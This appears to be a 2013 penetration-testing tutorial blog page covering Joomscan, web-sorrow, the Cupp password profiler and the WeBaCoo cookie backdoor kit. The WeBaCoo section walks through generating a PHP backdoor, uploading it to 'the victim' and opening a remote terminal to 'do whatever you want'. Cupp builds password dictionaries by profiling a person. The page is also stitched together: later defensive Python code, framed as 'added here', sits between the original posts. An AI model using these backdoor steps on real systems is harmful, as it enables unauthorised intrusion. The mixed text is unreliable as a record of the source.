Showing posts with label PenTesting Tutorials.

Wednesday, December 4, 2013

JOOMSCAN (JOOMLA SECURITY SCANNER)


Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version can detect 673 vulnerabilities. It detects file inclusion, SQL injection and command execution vulnerabilities in a target Joomla! web site.

VIDEO TUTORIAL:
http://adf.ly/VVqO6

DOWNLOAD LINK: LINK 1

WEBACOO - WEB BACKDOOR COOKIE SCRIPT-KIT

Usage: webacoo.pl [options]

Options:
-g            Generate backdoor code (-o is required)
-f FUNCTION   PHP system function to use
              FUNCTION:
                1: system (default)
                2: shell_exec
                3: exec
                4: passthru
                5: popen
-o OUTPUT     Generated backdoor output filename
-r            Return un-obfuscated backdoor code
-t            Establish remote "terminal" connection (-u is required)
-u URL        Backdoor URL
-c C_NAME     Cookie name (default: "M-cookie")
-d DELIM      Delimiter (default: new random for each request)
-a AGENT      HTTP header user-agent (default exists)
-p PROXY      Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL      Verbose level
              LEVEL:
                0: no additional info (default)
                1: print HTTP headers
                2: print HTTP headers + data
-h            Display help and exit
update        Check for updates and apply if any

1. Generate the PHP backdoor file:
   ./webacoo.pl -g -o backdoor.php

2. Upload the backdoor to the victim.

3. Use WeBaCoo to connect to the backdoor:
   ./webacoo.pl -t -u http://victim/backdoor.php

4. Now you are in the victim console, do whatever you want :)
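A defender-side counterpart to the steps above, added here as an example (it is not part of the original post or of WeBaCoo): a small scanner that walks a web root for PHP files in which one of the command-execution functions listed under -f (system, shell_exec, exec, passthru, popen) is fed directly from request-controlled input such as $_COOKIE, the channel a cookie backdoor uses. Function names are mine; the sample PHP sources are constructed, and only the "M-cookie" default comes from the page.

```python
import os
import re

# PHP command-execution functions WeBaCoo's -f option can generate a backdoor with.
EXEC_FUNCS = ("system", "shell_exec", "exec", "passthru", "popen")
# One of those functions whose argument list (same statement, up to the ';')
# contains request-controlled input such as $_COOKIE, even inside a decoder call.
EXEC_RE = re.compile(
    r"\b(?P<func>" + "|".join(EXEC_FUNCS) + r")\s*\([^;]*?"
    r"(?P<src>\$_(?:COOKIE|GET|POST|REQUEST|SERVER))",
    re.IGNORECASE,
)
COOKIE_NAME_RE = re.compile(r"\$_COOKIE\s*\[\s*['\"]([^'\"]+)['\"]\s*\]")

def scan_php_source(src):
    """Return [(function, input_source, cookie_name_or_None, line)] for one file's text.
    Limitation: input copied into a variable and executed in a later statement is not
    tracked, so an empty result means 'no direct pattern found', not 'clean'."""
    findings = []
    for m in EXEC_RE.finditer(src):
        end = src.find(";", m.start())
        stmt = src[m.start():end if end != -1 else len(src)]
        cookie = COOKIE_NAME_RE.search(stmt)
        line = src.count("\n", 0, m.start()) + 1
        findings.append((m.group("func").lower(), m.group("src").upper(),
                         cookie.group(1) if cookie else None, line))
    return findings

def scan_web_root(root):
    """Walk a web root and map each PHP file that has findings to its findings list."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
            except OSError:
                continue
            if found:
                hits[path] = found
    return hits

# Constructed sample sources (not taken from any real site or from WeBaCoo).
SAMPLE_DIRECT = "<?php\n@system($_COOKIE['M-cookie']);\n"
SAMPLE_DECODED = "<?php\n$x = 1;\npassthru(base64_decode($_COOKIE['sess']));\n"
SAMPLE_BENIGN = "<?php\necho htmlspecialchars($_GET['q']);\nexec('ls');\n"
```

Run scan_web_root() over a site's document root and review each hit by hand; a clean result only means no direct pattern was found.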

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=6PS3ul7_JRo

DOWNLOAD LINK: LINK 1

WEB-SORROW TOOL

web-sorrow is a Perl-based tool used for checking a web server for misconfiguration, version detection, enumeration, and server information. It is NOT a vulnerability scanner, inspection proxy, DDoS tool or an exploitation framework.

Current Functionality:

-S – stands for standard: a set of standard tests that includes directory indexing testing, banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 OK for every request).

-Eb – stands for error bagging. The default config for servers is to put the server daemon and version, and sometimes even the OS, inside error pages. web-sorrow requests a URL of 20 random bytes with the GET and POST methods.

-auth – looks for login pages using a list of some of the most common login files and directories. The list doesn't need to be very big, because what else are you going to name it?

-cmsPlugins – runs a huge list of plugin directories for CMS servers. The list is a bit old (2010).

-I – searches the responses for interesting strings.

-Ws – looks for web services such as hosting provider, blogging services, favicon fingerprinting, and CMS version info.

-Fd – looks for things people generally don't want you to see. The list is generated from a ton of robots.txt files, so whatever it finds should be interesting.

-proxy – send all HTTP requests via a proxy. Example: 255.255.255.254:8080

-e – run all the scans in the scanner.

web-sorrow also has false-positive checking on most of its requests (it's pretty accurate but not perfect).
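The -Eb "error bagging" check above is easy to turn into a self-test for a server you administer: request a random path, then look at the error response for the daemon, framework and OS strings that stock error pages disclose. The code below is an added example (not part of web-sorrow or of this post); the function names are mine, the header list and regexes are heuristics, and the two sample responses are constructed.

```python
import re
import secrets
import urllib.error
import urllib.request

# Response headers that commonly carry the daemon, framework and version.
VERSION_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
# "Product/1.2.3" tokens such as Apache/2.4.7 or PHP/5.5.9 (heuristic: word/number.number).
PRODUCT_VERSION_RE = re.compile(r"\b([A-Za-z][\w.-]*)/(\d+(?:\.\d+)+)")
# OS hints that default error pages append, e.g. "(Ubuntu)" or "(Win64)".
OS_HINT_RE = re.compile(r"\((Ubuntu|Debian|CentOS|Red Hat|FreeBSD|Win32|Win64|Unix)\)")

def disclosures(text):
    """All (product, version) pairs in a string; OS hints come back as ('os', name)."""
    found = list(PRODUCT_VERSION_RE.findall(text))
    found += [("os", name) for name in OS_HINT_RE.findall(text)]
    return found

def find_version_leaks(headers, body):
    """Return [(location, product, version)] for one response.
    headers: mapping of header name -> value (any case); body: decoded response text."""
    leaks = []
    for name, value in headers.items():
        if name.lower() in VERSION_HEADERS:
            leaks += [("header:" + name.lower(), p, v) for p, v in disclosures(value)]
    leaks += [("body", p, v) for p, v in disclosures(body)]
    return leaks

def probe_error_page(base_url, method="GET", timeout=5):
    """Request a path of 20 random bytes (hex-encoded), as the -Eb test does with
    GET and POST, and check the resulting error page with find_version_leaks()."""
    url = base_url.rstrip("/") + "/" + secrets.token_hex(20)
    req = urllib.request.Request(url, method=method)
    try:
        resp = urllib.request.urlopen(req, timeout=timeout)
    except urllib.error.HTTPError as err:  # a 404/405 still carries the error page
        resp = err
    body = resp.read().decode("utf-8", "replace")
    return find_version_leaks(dict(resp.headers.items()), body)

# Constructed responses: a stock error page next to a hardened one (not real captures).
LEAKY_HEADERS = {"Server": "Apache/2.4.7 (Ubuntu)", "X-Powered-By": "PHP/5.5.9"}
LEAKY_BODY = ("<h1>Not Found</h1>\n<address>Apache/2.4.7 (Ubuntu) Server at "
              "www.example.test Port 80</address>")
HARDENED_HEADERS = {"Server": "Apache"}
HARDENED_BODY = "<h1>Not Found</h1>"
if __name__ == "__main__":
    print(find_version_leaks(LEAKY_HEADERS, LEAKY_BODY))
    print(find_version_leaks(HARDENED_HEADERS, HARDENED_BODY))
```

An empty list from probe_error_page() for both GET and POST means the error page gives away neither version nor OS.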

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=GoSzXtKGU9o

DOWNLOAD LINK: LINK 1

Cupp (Common User Passwords Profiler)

Cupp is a common user password profiler. Using this script we can build our own dictionary by profiling someone: a birthday, nickname, address, name of a pet or relative, or common words like god, love, money, and other likely passwords.

Options:

-h  You are looking at it baby! :)
    For more help take a look in docs/README
    Global configuration file is cupp.cfg

-i  Interactive questions for user password profiling

-w  Use this option to improve an existing dictionary, or WyD.pl output, to make some pwnsauce

-l  Download huge wordlists from repository

-a  Parse default usernames and passwords directly from Alecto DB.
    Project Alecto uses purified databases of Phenoelit and CIRT which were merged and enhanced.

-v  Version of the program
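Added here as a defender-side example (not part of the original post or of Cupp itself): a password-policy check that applies the same profiling idea in reverse, rejecting candidate passwords that contain a user's profile words (with the usual letter-to-digit swaps undone) or the birthdate written as digits. Function names and the profile key names are mine; the profile and the candidate passwords are constructed.

```python
import datetime

# Undo the letter/digit swaps a profiler applies (a->4, e->3, i->1, o->0, s->5, a->@, s->$).
DELEET = str.maketrans("43105@$", "aeiosas")

def profile_words(profile):
    """Base words a profiler would expand into a dictionary, plus their reversals.
    profile keys (all optional): name, surname, nickname, pet, partner, words (list)."""
    words = set()
    for key in ("name", "surname", "nickname", "pet", "partner"):
        if profile.get(key):
            words.add(profile[key].lower())
    words.update(w.lower() for w in profile.get("words", ()))
    words.update(w[::-1] for w in list(words))
    return {w for w in words if len(w) >= 3}  # 1-2 letter tokens would match anything

def date_tokens(birthdate):
    """Digit strings derived from a birthdate (e.g. 1990, 0503, 0305, 05031990, 050390)."""
    if birthdate is None:
        return set()
    return {birthdate.strftime(f) for f in ("%Y", "%d%m", "%m%d", "%d%m%Y", "%d%m%y")}

def check_password(password, profile):
    """Return None if the password is not obviously profile-derived, else a reason."""
    lowered = password.lower()
    deleeted = lowered.translate(DELEET)  # so J0hnny and johnny compare equal
    for word in sorted(profile_words(profile), key=len, reverse=True):
        if word in deleeted:
            return "contains profile word %r" % word
    for token in sorted(date_tokens(profile.get("birthdate")), key=len, reverse=True):
        if token in lowered:
            return "contains birthdate token %r" % token
    return None

# Constructed profile and candidate passwords (not a real person or real credentials).
PROFILE = {"name": "John", "surname": "Smith", "nickname": "Johnny", "pet": "Rex",
           "birthdate": datetime.date(1990, 3, 5), "words": ["Liverpool"]}

if __name__ == "__main__":
    for candidate in ("J0hnny1990!", "Rex05031990", "Summer0503", "xK#7mP2qL!"):
        print(candidate, "->", check_password(candidate, PROFILE))
```

The check is deliberately a substring test rather than a full mutation list, so it also catches profile words buried inside longer passwords.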


VIDEO TUTORIAL:
http://www.youtube.com/watch?v=U0kAE3uj4Qs


DOWNLOAD LINK: LINK 1

Thursday, November 28, 2013

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?

Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version can detect 550 vulnerabilities. Let me show how to use joomscan in Backtrack 5.

Download Joomscan from here:
http://web-center.si/joomscan

Step 1: Moving to the PenTest folder

Copy or move the downloaded files into the directory

/pentest/web/scanners/joomscan/


Step 2: Set Permission

Now you have to set the permission for the Joomscan file. To do this, type the following command in the Terminal (if you don't know how to open a terminal at all, please stop reading this and start from the basics of Linux).

chmod 0777 joomscan.pl


Step 3: Update

Update the scanner to the latest version. To do this, enter the following command in the Terminal:

./joomscan.pl update


Step 4: Scanning for Vulnerability

Now that everything is OK, we have to scan our Joomla site for vulnerabilities. To do this, enter the following command in the Terminal:

./joomscan.pl -u www.YourJoomlasite.com


Wait a while, and it will list the vulnerabilities found.